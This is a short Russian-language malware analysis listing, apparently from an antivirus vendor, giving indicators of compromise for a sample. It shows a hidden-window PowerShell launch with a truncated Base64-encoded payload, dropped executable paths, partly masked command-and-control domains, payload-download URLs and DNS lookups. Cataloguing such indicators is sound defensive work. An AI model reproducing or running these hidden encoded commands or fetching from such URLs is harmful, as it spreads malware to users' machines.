Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABJAHAAcgBhAHgAdgBoAHcAYwBrAGEAYQA9ACcASABnAGUAcgBzAGsAZABlACcAOwAkAFoAcgBoAG8AaQB4AHYAYQB6AGkAegB6ACAAPQAgACcANwA2ADkAJwA7ACQARQB0AGIAbQB3AHMAaABhAHoAPQAnAEQAdABrAGUAagBjAG8AeAB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\881280.cvr
- %HOMEPATH%\769.exe
- 'co###roof.com':443
- 'co#####ocontinuo.com':80
- 'fe###legal.com':80
- 'si###uehair.com':80
- http://fe###legal.com/uploads/OIf3/
- http://si###uehair.com/saloon/guWvE535/
- 'co###roof.com':443
- DNS ASK ac#####eastrologys.com
- DNS ASK co###roof.com
- DNS ASK co#####ocontinuo.com
- DNS ASK fe###legal.com
- DNS ASK si###uehair.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABJAHAAcgBhAHgAdgBoAHcAYwBrAGEAYQA9ACcASABnAGUAcgBzAGsAZABlACcAOwAkAFoAcgBoAG8AaQB4AHYAYQB6AGkAegB6ACAAPQAgACcANwA2ADkAJwA7ACQARQB0AGIAbQB3AHMAaABhAHoAPQAnAEQAdABrAGUAagBjAG8AeAB... (со скрытым окном)